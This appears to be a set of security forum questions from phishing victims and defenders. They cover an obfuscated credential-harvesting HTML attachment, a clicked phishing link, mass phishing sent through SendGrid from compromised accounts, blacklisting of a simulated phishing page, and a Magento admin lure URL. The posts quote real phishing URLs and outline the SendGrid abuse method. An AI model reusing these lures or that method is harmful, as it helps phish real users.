Suspected phishing attack – is this obfuscated JavaScript dangerous? [on hold]

I encountered an email from someone with an HTML attachment (the user is somewhat trusted). I by mistake clicked on the attachment in Gmail but immediately closed the new window. On viewing the source code it looks like there’s obfuscated JavaScript code, suggesting something malicious. However, I’m battling to decode it to discover what it’s trying to do. I tried using http://deobfuscatejavascript.com/ which has been somewhat helpful, but some parts I can’t decode. It looks to be trying to replicate Gmail and ask for a username/password, but presumably it would then try send it somewhere – although I can’t find or decode that part.

I’ve added a paste bin below with the file (it had lots of white space which I’ve since removed):

https://pastebin.com/N0mdsh1g

It seems to using something called HTML Guardian on parts to obfuscate it.

Any help would be appreciated to discover if it really is dangerous or not.

Thanks!

Mindlessly clicked days old phishing email link appeared dead

Was multitasking and mindlessly clicked sqaurespace phishing email. Page didn’t load, and right away I realized my mistake. Completed several malware scans which came back clean. The button link source was “https://sqwe7.com/”. The domain was registered on Aug 8, I got the email Aug 9, but didn’t click till Aug 11. The domain is no longer active. Did my getting to the email late save my ass? I searched but can’t find any other history on the domain other than it being tagged as phishing Aug 9. Couldn’t find any other links when inspecting the source of the link, unless I am missing something which is very possible.

Thank in advance for any advice.

SendGrid emails ignoring SPF records for mass phishing attempts

Recently we have encountered 2 instances of mass phishing attempts from 2 accounts using SendGrid although the SPF is published as hard fail for both without SendGrid records and only for the mail servers authorized to send.

To elaborate on the details, we encountered this during the investigation of multiple email incidents, lets take two domains abc.com and def.com – abc.com is on O365 while def.com is on premises (Exchange 2016). Unfortunately through phishing attacks the malicious attackers were able to compromise 1 account each from both domains and then used this to register on SendGrid (email header analysis shows SendGrid servers sending out emails), using this they were able to send out mass phishing emails from SendGrid to external users and Gmail, Yahoo and other corporate domains etc. although SPF records published as hardfail only specified O365 and on premises exchange IP’s for the domains respectively.

Quite surprised as how these emails were able to make it to the inbox of the recipients although there is no SPF, DKIM etc. set authorizing SendGrid. There is only an SPF record configured as mentioned earlier for either O365 or on-premises which is weird since it’s for both O365 cloud based and on-premises services, ruling out any cloud to cloud integrations etc. between O365 and SendGrid. There seems to be an increase in these types of attacks lately where a compromised account is used to create an account and have it verified it on SendGrid and then used for mass mailer (phishing) activities from those domains.

I was wondering if someone could shed some light on this as there is no DKIM for signing the domains, there is no SPF authorizing SendGrid and is set to -all (hardfail) but yet with the compromised accounts they are able to send out phishing emails through SendGrid by simply registering with them using the compromised accounts. We tested this out on a lab scenario and were able to replicate this on O365 and on-premises by sending emails to Gmail etc. which were received in the inbox by registering with SendGrid and with no DNS records authenticating or authorizing SendGrid to send on behalf of the domains.

Many Thanks.

Whitelist Simulated phishing landing page

We are running a simulated phishing campaign and one of the landing pages has been blacklisted by google. If you try to visit it in chrome you get the big, red warning page “Deceptive site ahead” (works OK in other browsers).

I assume one of our users reported it, thinking it was a real phishing page (kudos for that!) but now we have the problem that other users who are clicking the links in the emails we send are seeing the warning and not continuing, so we are not collecting data on them, or testing to see if they would go further and enter their credentials. Most importantly, we are missing the opportunity to train users who need that training!

I followed the “report a detection problem” link last week but the domains are still blacklisted. This is my question:

Is there a way to whitelist our landing pages with google and the other browser makers, so even though they look like phishing pages, they don’t get blacklisted in the future?

Magento Phishing Attempt

I got a suspicious email which looked pretty legit today and wanted to share with the community and maybe people who are more security savvy than me can tell me more about this Phishing attempt.

Basically it’s an email from a ‘customer’ who says they have put in the wrong address and add a link to the email to what looks like your own website that looks like:

[yourwebsite]/order/view/order_id/key/1ee0a069b22ac438e25ad3acbc4a3bcb/ 

It contains a link to :

https://www.magepanel.info/[yourwebsite]/admin?next=https://[yourwebsite]/order/view/order_id/key/02c9bfb2a970ab62ef8643a47e646064 

Does anyone know what type of exploit this is and what it does if you click it?

Thanks!